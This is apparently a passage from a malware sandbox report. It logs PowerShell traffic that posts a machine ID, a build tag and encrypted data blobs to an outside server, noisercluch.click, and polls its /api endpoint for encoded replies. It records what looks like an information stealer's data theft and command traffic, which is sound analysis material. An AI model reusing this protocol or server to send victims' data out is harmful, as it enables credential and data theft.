2024-12-30 18:17:50 UTC	15331	OUT	Data Raw: 2d 2d 4a 48 58 38 35 41 44 52 4f 52 5a 41 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 41 46 45 43 32 44 30 44 42 44 31 33 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 4a 48 58 38 35 41 44 52 4f 52 5a 41 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 48 58 38 35 41 44 52 4f 52 5a 41 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 4a 48 58 38 35 41 44 52 Data Ascii: --JHX85ADRORZATNContent-Disposition: form-data; name="hwid"3DAFEC2D0DBD13D4D9AC212D15D33917--JHX85ADRORZATNContent-Disposition: form-data; name="pid"1--JHX85ADRORZATNContent-Disposition: form-data; name="lid"WG6I6S--web44--JHX85ADR
2024-12-30 18:17:50 UTC	15331	OUT	Data Raw: 81 87 23 2c b3 88 2d ff 3c 56 29 e2 ee d2 12 f0 c1 9d 4f 62 51 6f c3 29 cd 4d b5 04 eb 5e 28 a4 2e 64 45 d5 e5 11 56 c8 e6 a1 e2 a2 37 c6 33 15 ba 06 2d 52 72 d5 4f 0d c6 60 f7 66 c1 35 b5 5e 7b c8 3d c1 f9 1a b4 44 d0 28 df 7b 16 04 b7 0f aa 05 62 81 a9 e4 17 c6 50 fa cd cd 37 65 8f 15 4b d9 89 b7 9b 49 20 e1 77 b1 35 f0 fb 01 c6 c4 50 2d e3 3a db 67 1c 85 01 27 3e 53 23 e4 3e 51 4f 83 e0 2c 3c 2c 8a 8e d0 4f 84 d8 80 35 cd 0f 72 ee a3 a8 68 2e 6a eb 15 54 97 cc b7 29 c6 2d e5 03 d6 14 b7 55 00 2b fe 2a 72 9c 46 cd 66 61 9e fe 2e 27 7a 00 0e ce 0e c7 d1 74 00 92 83 fd ef 76 18 6f 90 0a c6 45 d6 a4 f7 21 90 89 b1 fd e0 11 89 a5 b6 3e a2 ac 87 99 e5 7d 75 c3 0a 8a 03 95 e8 c8 2f 20 2b 60 fd 7b e9 15 40 1f 10 56 d8 ef 01 7c 5d 4b f8 75 90 79 4c f2 18 ad d3 Data Ascii: #,-<V)ObQo)M^(.dEV73-RrO`f5^{=D({bP7eKI w5P-:g'>S#>QO,<,O5rh.jT)-U+*rFfa.'ztvoE!>}u/ +`{@V\|]KuyL
2024-12-30 18:17:50 UTC	15331	OUT	Data Raw: 4b 84 ed 23 ed 82 8b bf 54 df 2c 10 40 a1 be 4d 85 5f 5c 12 89 be 55 66 b3 4b 62 87 10 69 a1 aa ae 6d 30 98 38 e5 e5 65 37 92 e5 3d a5 7a 7b b3 cf 54 98 9f 7f d5 b1 8c fa 14 08 14 a3 48 7f ba 31 47 fa e6 91 f8 6c 41 0d ae 39 91 86 ff 70 9a 64 5a 3f a0 94 7a 37 7c df 64 a3 1e 4b e1 92 23 a3 5b bc 57 14 e4 1d bd 82 6a ca ca ec 62 d4 ce 69 bd 5d 5e bd 3d 18 a2 b3 dd 3d e8 df 71 72 ae 49 f6 ba 7f 1d f7 cb f5 c1 41 f6 c0 8c 0b 6b 34 09 22 67 0d c7 de 77 1a 6f d5 5d 56 09 6a d1 68 2e ff b1 25 69 78 26 f8 7d f4 8b b7 b6 d4 a0 cb 38 50 c0 31 db d2 25 02 f2 5a 9a de 84 8f 2f ef f2 c2 7c 45 47 43 c0 ef 91 c3 a2 01 d6 79 0a 1e 6c 95 80 8d 4a c1 cd 4f 80 f5 15 31 62 72 7f 26 1e 01 4f 6f fe de 3f bb 70 be c4 0e 29 14 02 44 2b de 99 f2 ff df 65 4a ee 81 68 ca 39 44 9f Data Ascii: K#T,@M_\UfKbim08e7=z{TH1GlA9pdZ?z7\|dK#[Wjbi]^==qrIAk4"gwo]Vjh.%ix&}8P1%Z/\|EGCylJO1br&Oo?p)D+eJh9D
2024-12-30 18:17:50 UTC	15331	OUT	Data Raw: 6a 07 1c c7 cb 14 5e 7c 6b df 6e f4 75 13 86 67 4f 04 c4 cb bd f2 aa bc c5 be e0 59 28 22 7d 91 07 7c 99 d7 a1 b2 d7 96 3a 01 fe 5f 4d b0 01 3e 67 54 75 0c dd 27 cf 38 ea 3e 10 4a dd 3d 0b 01 f7 82 bd 00 9b 50 23 37 74 9e 00 0d e6 2f 71 51 0f a6 46 5a 28 03 92 3b dd f8 3d ff ea 2e 97 96 a3 c0 a9 cd a9 65 aa d3 b7 2f 15 3f 74 76 ee 5e fd c0 49 7f 3b c6 4f 3d e8 40 b9 e4 a1 4d b3 2a 80 79 ef 7e 1a 42 54 f8 05 b3 9e 13 72 be be e0 24 72 34 1f a8 0f 10 52 a7 06 3f 2e 68 06 74 dd 5a 1c 3f c2 f1 bd aa b9 55 2f 72 c3 4c 64 44 8a 38 f2 e2 4f c0 98 c7 a9 8a a1 00 2a 0d 51 f4 a4 26 7c 62 a9 66 f4 cd ee 72 7b 41 b1 82 fb c8 c4 d6 af 4b ba 4b 37 04 ee e4 31 02 de 34 d0 8b 74 f4 2f 7c 83 13 bf 9a 50 7f 5f e3 c2 df b7 6a 0d d3 d9 6d ed 66 3d 06 2d 13 6f 7d 15 b5 b4 3e Data Ascii: j^\|knugOY("}\|:_M>gTu'8>J=P#7t/qQFZ(;=.e/?tv^I;O=@My~BTr$r4R?.htZ?U/rLdD8OQ&\|bfr{AKK714t/\|P_jmf=-o}>
2024-12-30 18:17:50 UTC	15331	OUT	Data Raw: b1 c9 44 dd e6 19 39 2a 7d 9e f9 c6 db 2a 3d a6 5c 3b 25 c1 08 75 a7 7b 46 ec 05 37 14 82 c7 dc 95 54 79 53 6a 69 88 37 d7 9f 9e ed 08 26 db 71 bd 64 68 15 29 1b 61 96 b0 80 4e 83 f5 da e0 b4 24 41 71 fb a5 94 8e d3 58 3c e6 30 38 2f c8 55 2f d8 3b 78 e4 a8 67 3d 8c d9 b8 49 4a 17 d0 fa bf 45 fa ff df e5 2a 2f 58 9b 84 25 a0 40 da bc 20 c9 1f dc 44 6a 21 81 ee d9 e1 34 22 8a 12 4d 96 44 73 b1 a4 2a 99 5b e5 20 0b fe 05 07 90 d3 0a f3 bc ef 05 c1 4d 5e ef b3 11 18 67 7c 0e b5 ba f1 f9 a3 07 19 ff b8 60 33 92 9f d6 eb c6 33 a1 d4 19 5e 7d 1c 8a ac e4 f2 56 ae 0c 00 07 ed b0 d7 8a b0 6c a9 24 a2 65 6a 08 6c da 28 c9 52 81 da bd bf 69 89 7e 14 64 b5 72 8f 4b f4 b0 43 66 ef ef e3 7f 88 b9 75 64 00 d9 12 e4 2d 08 f6 2d 77 54 92 8f ee 50 76 12 3d 6b 45 01 7c fd Data Ascii: D9}=\;%u{F7TySji7&qdh)aN$AqX<08/U/;xg=IJE/X%@ Dj!4"MDs[ M^g\|`33^}Vl$ejl(Ri~drKCfud--wTPv=kE\|
2024-12-30 18:17:50 UTC	15331	OUT	Data Raw: e7 95 64 66 12 ca 04 b1 4b 16 07 b7 cb a7 a6 71 72 16 44 c5 18 2f 76 5f 39 f7 8a f5 a9 9e 3e f4 93 d3 c8 d2 1c 87 86 07 50 64 85 e5 73 8d 2a ad 6f 14 92 e8 d6 2f 4f 9a 48 c3 04 cc d4 71 32 99 5c 6f 18 1d 22 b0 a1 ab d2 76 44 28 f8 03 e3 80 d5 c1 62 8e 24 38 28 7d dc 85 38 06 4c 0b d8 91 36 6d c0 c8 b8 a3 3f 87 59 e1 e2 5c bb 66 10 cf be 75 89 e2 7a 84 98 2e 45 e8 c9 2d 4c 2f f6 a0 ff da 91 5b 60 ac 21 8c d8 37 8f 1e ff b3 9b e5 26 05 96 d2 f7 93 b7 c6 e3 54 ad 5d fa e2 bf ae 78 43 74 27 7e f4 77 1b 9b c4 b9 af b1 4e d7 77 e1 1c d6 e3 e1 65 b1 33 f6 6d 38 ba cb f8 c6 6f cb c2 04 5e 0c 91 7a 49 2c 2e b8 51 77 42 12 75 4b 84 92 bb a2 36 2a 5b 92 94 e4 a5 79 68 3c b1 e8 be 36 4a 55 61 b3 74 87 8a 34 6a e3 23 ed 8b dc 04 3d b3 99 3d 62 a4 00 f7 23 cd f6 08 0a Data Ascii: dfKqrD/v_9>Pdso/OHq2\o"vD(b$8(}8L6m?Y\fuz.E-L/[`!7&T]xCt'~wNwe3m8o^zI,.QwBuK6[yh<6JUat4j#==b#
2024-12-30 18:17:50 UTC	15331	OUT	Data Raw: dd 2d 7b 4b b4 47 f6 c0 df a4 6e 96 d5 d6 0e 17 c9 08 d7 3d 71 58 18 13 94 b2 99 ac 83 6e db ba db fd 40 47 c2 6b 3b 36 ec 02 3b 4b 84 64 bb 16 ae ee 10 1e 05 a3 70 1e 41 71 e8 08 0b e3 07 d7 97 76 80 17 1d ad 26 46 e1 21 53 02 0d da 23 f5 86 d9 70 22 c3 da b9 3a 55 2c 57 8c 82 8d 30 cc 21 9e ca a6 13 be 99 e2 79 78 30 24 f0 33 88 56 f5 66 79 bf 27 1f d5 f9 08 c5 b9 4c 25 2d 54 1e fa f2 14 45 86 4d 66 0e d3 19 6a 03 a1 96 ac 14 5d 41 95 ef e5 e2 e7 7a 8e 0a 51 71 81 b8 94 46 69 6a 74 a0 c0 86 fb 1e 7c 5a 58 05 df 44 ec fc 42 be a9 ee 97 20 7e 56 51 6c 70 ba 6a b7 1b 42 64 a4 52 70 4c d6 72 e0 79 a7 8c 2f 91 ab f9 9e bb ef 43 c4 af 24 9b 0d e8 1d 27 d9 54 70 a1 84 d5 5a ab 06 f0 e3 2a f4 81 b9 fe ca 6c 61 4d cf 78 a4 bc 52 cc 79 43 ec 63 27 7a 4a dd 92 0d Data Ascii: -{KGn=qXn@Gk;6;KdpAqv&F!S#p":U,W0!yx0$3Vfy'L%-TEMfj]AzQqFijt\|ZXDB ~VQlpjBdRpLry/C$'TpZ*laMxRyCc'zJ
2024-12-30 18:17:50 UTC	15331	OUT	Data Raw: 99 83 9f 2e e2 8b 55 49 83 d7 e4 a6 57 ac aa 07 4d 49 69 12 b9 c5 18 dc 0b cc 51 67 fa 1e 90 ab 8d f1 78 87 77 0c 5f 65 ec 1d 7d 1a 7a e4 70 6c d2 78 55 17 06 34 fe 84 e2 ca e7 e4 02 fe 80 6f bc 3f fe 4f 37 05 df 6c de 63 86 67 7c 1d ea 82 d6 dd df 5d d4 f4 a3 d9 73 bf 59 ff 11 51 e5 7e ee e3 bd d4 ed db ac ea f8 ef c3 f8 3b 0b 43 85 b9 63 99 5e 8c 13 73 97 94 f9 5b a0 8e bc df 2b 23 4a 57 58 17 99 c9 4b cb f3 ad e7 d9 1d 9d 6a f7 05 12 05 c0 b6 96 7b ad fc 8c 88 da ee 91 ff 0f 53 6f 1e 0f f5 1a fe ff df ef 59 cc 18 cb 0c d9 d7 91 36 45 94 16 4b cc 50 e1 1c 2d 4a 85 84 91 42 d9 46 f6 75 c6 16 a7 84 4e 0b 95 65 5a 29 b2 46 52 18 4b 51 84 b2 ef 63 df f7 65 30 db 6f 3a 9f ef e7 fb fd fd 53 d1 83 d9 ae fb ba ae d7 f3 75 df d7 1d 52 76 fd 22 b8 3f bf 32 b7 f9 Data Ascii: .UIWMIiQgxw_e}zplxU4o?O7lcg\|]sYQ~;Cc^s[+#JWXKj{SoY6EKP-JBFuNeZ)FRKQce0o:SuRv"?2
2024-12-30 18:17:50 UTC	15331	OUT	Data Raw: 17 bb e1 a3 03 ed cb a8 dc 57 4d 48 e3 d4 b9 d5 86 fa 19 d2 e6 ef 92 b5 a8 3a 48 7f 84 af ef 96 da e8 cb d6 b3 76 e1 88 d0 d0 4b d0 0b be 76 f9 27 ae 09 5c 9b 95 f6 a0 bb 23 04 40 ea 9d 8c 6c ba 3e 4c d7 24 b2 7b 3e fb 2b df 85 e9 59 cd 66 b9 3f cb 33 38 ab 0b d6 dc b2 7f 6b 83 de bf 5c 40 f8 84 55 05 ba 76 46 dc b4 d3 e5 58 9a 72 e5 52 6b ce ad df 6c 93 29 54 95 32 53 c0 62 52 3e 74 a8 e9 a5 f1 cb bc 12 d6 ae eb 0b 82 27 dc 7b 62 99 f6 1f ae f1 11 83 f8 8b 47 7d 83 62 54 c6 09 fd 0d ff e2 2e f2 dc ed a6 6b 55 f6 dd 5b 27 e0 74 7f 62 7e 6b b1 a2 2c 78 5c 02 83 93 ef 89 c9 28 14 7f 13 03 fe 70 ae 5e 7b ad e9 ed 06 68 d8 ec c7 89 9c cb 5f a3 f9 35 49 c7 3c ff c4 4b 28 42 51 68 31 11 4f 16 ed a7 3e f3 79 4e 44 78 56 d2 7a be bc 17 c5 c0 d0 15 33 54 7e 7b fe Data Ascii: WMH:HvKv'\#@l>L${>+Yf?38k\@UvFXrRkl)T2SbR>t'{bG}bT.kU['tb~k,x\(p^{h_5I<K(BQh1O>yNDxVz3T~{
2024-12-30 18:17:50 UTC	15331	OUT	Data Raw: 70 86 c7 fe 1a db 92 d7 00 a9 e8 8d a3 e7 d1 5d 1a 60 b6 e2 bd 8e 08 10 63 85 f1 38 d8 cb 30 ba 87 1d a0 7f 1c 0c d7 b7 fd e8 69 b7 3e 5b d4 ec dc 3a a1 a1 74 14 fd 7f 06 79 e8 e8 ca 45 f2 e1 ea 2c 20 ed db e8 14 15 3e 73 09 e8 ec d5 3a fa 17 20 05 85 2c 3a 6b 46 d2 0f 7a 67 cc af e1 16 9f 7e 31 db 21 75 b7 f1 c4 8e ae 88 ca 20 9b 23 5a 84 4e 1a 3c 92 1a 09 22 a9 11 20 96 eb f6 b2 74 f4 16 0a a1 69 fb 20 aa d2 bc 45 e6 cb ae 6c bb 8a 23 d9 76 72 1d e1 1f f4 b2 af 6c 04 3f b0 c5 b6 24 5a e4 0f 42 d5 68 60 99 7f f6 42 f9 e4 7b 34 67 f8 00 8c de 74 c1 5c e1 e3 51 e0 8e e4 f1 89 fe b3 0f 69 7f a6 1f 51 7b 85 c0 e3 88 8a 4b 20 29 3f ef d1 65 88 a8 60 49 e4 ff 5d 5d 29 3e 69 75 96 5a 25 01 72 c2 38 31 3b 56 2d 21 f6 a3 2a 42 e4 b1 10 8f e7 a4 69 59 21 5e 56 b0 Data Ascii: p]`c80i>[:tyE, >s: ,:kFzg~1!u #ZN<" ti El#vrl?$ZBh`B{4gt\QiQ{K )?e`I]])>iuZ%r81;V-!*BiY!^V
2024-12-30 18:17:52 UTC	1145	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 18:17:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ce7jb0f8d5jm56nb3tsvsqtipu; expires=Fri, 25 Apr 2025 12:04:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ycXEKvVdRkLKPWz6lClUTAiUDB9UsdQN0dTpQlrcaaKLU%2BQBdwHK%2FoIaBVT8%2BxGlQWJYSmGAYU64JwjT%2BL%2BzoPwvFF%2F4ztRcPTwjNzhizanZAF76vpq%2F8Ug9KVZlrb9hr5vl3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4076d1b21de97-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1692&rtt_var=659&sent=224&recv=603&lost=0&retrans=0&sent_bytes=2840&recv_bytes=586979&delivery_rate=1629464&cwnd=236&unsent_bytes=0&cid=bf1c8eb3f5320360&ts=2044&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49989	188.114.96.3	443	2292	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 18:17:53 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: noisercluch.click
2024-12-30 18:17:53 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 77 65 62 34 34 26 6a 3d 26 68 77 69 64 3d 33 44 41 46 45 43 32 44 30 44 42 44 31 33 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 Data Ascii: act=get_message&ver=4.0&lid=WG6I6S--web44&j=&hwid=3DAFEC2D0DBD13D4D9AC212D15D33917
2024-12-30 18:17:53 UTC	1140	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 18:17:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mqlmb7nha453qh6q1r4p58ekuo; expires=Fri, 25 Apr 2025 12:04:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9eOvHlaY9ErF2rAMuu3%2FigHiryd0TN0pSG4B8ny%2FfpIhiHYzmy%2FSIjhIHg1zIY%2BymFSbdoxeFshD%2Fnqbctk9AG%2BPimsNzalSY1pam42ncbsjXNkmZ%2BbMyiPrLs5zfctOFlfxdw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4077e1c67431a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=61710&min_rtt=1634&rtt_var=36193&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=983&delivery_rate=1787025&cwnd=224&unsent_bytes=0&cid=d839ad5730230e3f&ts=460&x=0"
2024-12-30 18:17:53 UTC	229	IN	Data Raw: 33 37 30 34 0d 0a 58 48 74 38 72 30 44 75 35 74 50 65 2f 35 63 6c 31 78 4f 2b 55 33 4b 43 46 72 46 73 77 71 4e 6b 37 2b 5a 44 67 56 37 6f 43 52 30 48 41 46 37 4a 4e 4d 7a 63 34 76 4c 64 38 67 66 74 49 70 4a 78 46 71 41 73 6b 79 6d 71 79 42 65 4e 73 6e 54 70 4c 71 4e 4d 4c 6a 55 52 49 49 42 34 76 4e 4b 63 72 36 72 74 45 62 6c 63 2b 42 73 42 78 56 58 64 47 37 58 6f 44 4b 54 51 41 4d 55 58 6f 6e 39 62 4f 69 70 4e 2f 54 53 2b 7a 5a 53 31 6b 4d 4e 71 6e 45 50 69 66 41 72 4b 63 59 63 63 6c 76 4d 4e 6a 4e 49 57 35 43 6d 78 51 6b 55 66 4f 67 33 71 4d 6f 47 76 6e 72 6d 53 72 33 65 65 53 66 49 55 51 71 6b 69 30 44 2b 71 37 56 43 41 75 6d 7a 64 63 61 31 73 57 53 30 58 4d 59 51 4b 6c 49 36 Data Ascii: 3704XHt8r0Du5tPe/5cl1xO+U3KCFrFswqNk7+ZDgV7oCR0HAF7JNMzc4vLd8gftIpJxFqAskymqyBeNsnTpLqNMLjURIIB4vNKcr6rtEblc+BsBxVXdG7XoDKTQAMUXon9bOipN/TS+zZS1kMNqnEPifArKcYcclvMNjNIW5CmxQkUfOg3qMoGvnrmSr3eeSfIUQqki0D+q7VCAumzdca1sWS0XMYQKlI6
2024-12-30 18:17:53 UTC	1369	IN	Data Raw: 42 36 62 33 77 56 62 52 65 2f 54 77 68 39 33 37 6f 46 59 48 42 48 4b 65 6e 49 74 59 48 6b 6a 78 4c 4c 69 77 4c 2b 41 32 45 30 4b 53 33 6a 74 73 4f 6d 43 4c 61 42 6a 58 42 55 64 51 49 38 70 63 6e 67 49 55 56 38 44 66 59 54 6e 41 50 4d 55 6e 43 44 37 76 53 6d 70 61 50 78 33 65 74 61 39 67 35 4a 2b 5a 68 39 52 61 53 7a 78 36 36 31 69 76 69 45 4b 56 41 4a 52 63 6a 50 2f 35 33 75 35 53 38 76 4c 4c 38 54 4f 39 41 35 43 73 67 77 33 6d 61 57 4b 50 77 44 4b 48 53 4c 4e 31 78 74 43 5a 57 4f 54 38 4e 35 77 6e 66 72 4c 6d 45 72 61 42 6b 73 47 50 64 48 6a 48 72 52 63 51 4c 70 64 6f 6e 6a 5a 34 47 35 6a 57 62 61 30 6c 72 41 77 7a 6b 42 64 32 50 75 59 4c 51 72 33 66 6a 58 4d 38 43 43 4c 59 6c 2f 69 71 4b 30 43 4f 47 69 6a 54 35 4c 34 42 43 4b 78 38 2f 4e 65 55 32 71 37 Data Ascii: B6b3wVbRe/Twh937oFYHBHKenItYHkjxLLiwL+A2E0KS3jtsOmCLaBjXBUdQI8pcngIUV8DfYTnAPMUnCD7vSmpaPx3eta9g5J+Zh9RaSzx661iviEKVAJRcjP/53u5S8vLL8TO9A5Csgw3maWKPwDKHSLN1xtCZWOT8N5wnfrLmEraBksGPdHjHrRcQLpdonjZ4G5jWba0lrAwzkBd2PuYLQr3fjXM8CCLYl/iqK0COGijT5L4BCKx8/NeU2q7
2024-12-30 18:17:53 UTC	1369	IN	Data Raw: 33 6e 2b 62 56 49 35 34 52 75 4e 46 32 53 4c 32 7a 44 6a 41 75 6d 7a 45 4f 36 78 34 63 52 46 51 4e 74 55 6f 76 4e 47 52 75 59 2f 30 61 4a 52 38 37 53 59 56 35 57 2f 79 44 72 72 6d 44 49 53 56 49 64 56 70 67 48 6c 57 47 55 67 56 78 52 7a 42 33 6f 48 71 73 4f 5a 77 72 53 66 51 48 44 54 4b 5a 66 59 76 72 74 51 54 70 49 34 49 74 78 32 73 51 46 63 71 50 69 2f 6f 45 35 61 53 67 36 75 34 2f 45 71 44 64 76 55 44 4c 71 31 75 2b 51 76 30 30 7a 43 2f 6a 79 43 31 43 34 31 2b 52 42 63 6a 4f 4f 34 78 71 35 53 38 6c 37 4c 77 53 4f 39 42 39 77 6b 2b 78 53 61 61 57 4b 50 77 44 4b 48 53 4c 4e 31 78 74 43 5a 59 4f 54 38 4e 77 77 33 46 72 4b 6d 32 72 61 42 6e 73 47 50 64 48 6a 48 74 52 63 51 4c 70 64 6f 6e 6a 5a 34 47 36 54 57 62 61 30 6c 72 45 77 7a 6b 42 64 32 50 75 59 4c Data Ascii: 3n+bVI54RuNF2SL2zDjAumzEO6x4cRFQNtUovNGRuY/0aJR87SYV5W/yDrrmDISVIdVpgHlWGUgVxRzB3oHqsOZwrSfQHDTKZfYvrtQTpI4Itx2sQFcqPi/oE5aSg6u4/EqDdvUDLq1u+Qv00zC/jyC1C41+RBcjOO4xq5S8l7LwSO9B9wk+xSaaWKPwDKHSLN1xtCZYOT8Nww3FrKm2raBnsGPdHjHtRcQLpdonjZ4G6TWba0lrEwzkBd2PuYL
2024-12-30 18:17:53 UTC	1369	IN	Data Raw: 48 62 6f 4d 67 65 70 65 2f 70 62 6a 74 6f 78 68 70 63 78 38 69 2f 5a 56 54 49 75 54 69 6e 42 64 34 65 6f 6e 4a 44 4c 2b 48 6e 34 4b 2b 4a 38 4d 4f 31 73 2f 79 69 45 77 51 36 4a 73 41 48 54 4f 5a 68 71 57 42 49 74 50 76 56 7a 68 4c 65 32 37 71 62 47 51 4c 56 48 31 54 51 6c 31 48 48 36 4f 2f 71 51 44 4a 6e 57 44 75 42 73 68 44 78 56 47 43 45 49 2f 51 48 57 6a 62 57 73 68 64 68 75 6e 56 58 66 4f 78 47 78 4a 4f 42 61 70 50 51 75 76 34 31 30 31 68 53 4c 66 47 63 37 4d 6a 72 49 44 39 71 41 6b 4c 4f 73 2b 45 54 67 59 59 34 37 4a 38 46 63 78 79 43 67 39 56 4f 36 76 67 2b 79 5a 70 74 76 57 77 77 78 44 4d 31 32 31 36 47 79 36 49 72 6a 66 4a 4e 53 2f 32 51 56 7a 53 43 61 46 66 47 61 4b 4a 71 57 65 75 6b 37 6d 6d 4e 5a 61 53 4d 49 2b 44 61 47 73 4f 58 6d 6c 76 78 41 Data Ascii: HboMgepe/pbjtoxhpcx8i/ZVTIuTinBd4eonJDL+Hn4K+J8MO1s/yiEwQ6JsAHTOZhqWBItPvVzhLe27qbGQLVH1TQl1HH6O/qQDJnWDuBshDxVGCEI/QHWjbWshdhunVXfOxGxJOBapPQuv4101hSLfGc7MjrID9qAkLOs+ETgYY47J8FcxyCg9VO6vg+yZptvWwwxDM1216Gy6IrjfJNS/2QVzSCaFfGaKJqWeuk7mmNZaSMI+DaGsOXmlvxA
2024-12-30 18:17:53 UTC	1369	IN	Data Raw: 45 37 36 6d 50 61 49 4b 66 46 4e 37 72 56 42 63 55 50 73 47 74 57 48 6b 38 4a 36 44 4b 42 71 35 36 36 6c 64 68 33 35 57 62 32 41 67 65 31 55 49 67 70 6d 4e 41 49 71 61 30 76 30 57 69 75 59 48 45 52 44 69 33 32 47 5a 54 52 6d 5a 44 4f 77 57 69 47 65 39 55 63 45 64 34 35 32 79 2b 67 32 79 79 4f 30 6a 62 43 61 5a 74 68 62 43 55 6a 42 63 59 36 73 73 6e 72 70 72 72 51 53 75 52 2f 33 77 6f 42 32 45 7a 48 58 62 58 49 4d 37 37 58 46 64 42 72 32 6b 52 71 4c 43 38 39 2f 69 79 70 6c 49 43 71 68 38 5a 4c 74 56 48 59 49 41 54 44 52 4e 55 47 6a 63 35 64 75 4b 52 30 32 57 32 6a 4d 58 77 57 45 53 6e 32 4d 4a 6e 65 35 37 4f 79 6f 32 4c 76 51 76 63 45 45 2b 4e 44 79 54 71 79 2b 79 79 63 69 44 76 4b 44 61 56 44 52 43 77 66 47 4e 34 4d 6c 49 36 42 68 36 6e 6a 63 2f 78 4b 37 Data Ascii: E76mPaIKfFN7rVBcUPsGtWHk8J6DKBq566ldh35Wb2Age1UIgpmNAIqa0v0WiuYHERDi32GZTRmZDOwWiGe9UcEd452y+g2yyO0jbCaZthbCUjBcY6ssnrprrQSuR/3woB2EzHXbXIM77XFdBr2kRqLC89/iyplICqh8ZLtVHYIATDRNUGjc5duKR02W2jMXwWESn2MJne57Oyo2LvQvcEE+NDyTqy+yyciDvKDaVDRCwfGN4MlI6Bh6njc/xK7
2024-12-30 18:17:53 UTC	1369	IN	Data Raw: 2f 34 51 32 50 39 42 37 65 68 53 47 30 4a 35 35 49 52 78 49 52 50 38 63 53 6d 59 4b 35 6c 73 7a 62 46 37 6c 38 39 7a 73 32 31 33 72 31 41 71 33 4a 48 72 61 69 4e 72 4d 2f 33 32 39 57 62 7a 77 76 79 78 6d 69 76 34 54 6e 75 4f 56 4a 37 30 58 62 5a 44 4f 77 57 39 51 5a 6d 4e 51 78 68 37 63 4f 77 6d 71 6b 52 6e 34 41 56 42 62 73 49 70 61 43 6d 61 36 75 78 55 2b 74 65 2f 55 77 42 62 4e 4b 6e 6c 53 79 2f 30 75 61 6b 69 58 6b 4f 34 39 56 4d 6a 49 6a 46 73 6f 4c 69 49 33 71 75 34 57 67 51 35 67 6c 2f 52 63 37 79 47 44 33 58 4b 2f 50 4a 70 32 48 4e 73 51 75 33 46 31 46 41 46 51 46 77 51 61 69 6c 4c 57 78 75 76 55 64 2f 47 72 6f 48 41 58 62 5a 38 4d 34 6a 2f 39 4c 76 59 74 6f 2b 42 69 4f 62 46 6b 70 53 52 32 5a 42 36 6e 52 6d 72 2b 4d 7a 32 72 68 4a 66 67 50 58 64 Data Ascii: /4Q2P9B7ehSG0J55IRxIRP8cSmYK5lszbF7l89zs213r1Aq3JHraiNrM/329Wbzwvyxmiv4TnuOVJ70XbZDOwW9QZmNQxh7cOwmqkRn4AVBbsIpaCma6uxU+te/UwBbNKnlSy/0uakiXkO49VMjIjFsoLiI3qu4WgQ5gl/Rc7yGD3XK/PJp2HNsQu3F1FAFQFwQailLWxuvUd/GroHAXbZ8M4j/9LvYto+BiObFkpSR2ZB6nRmr+Mz2rhJfgPXd
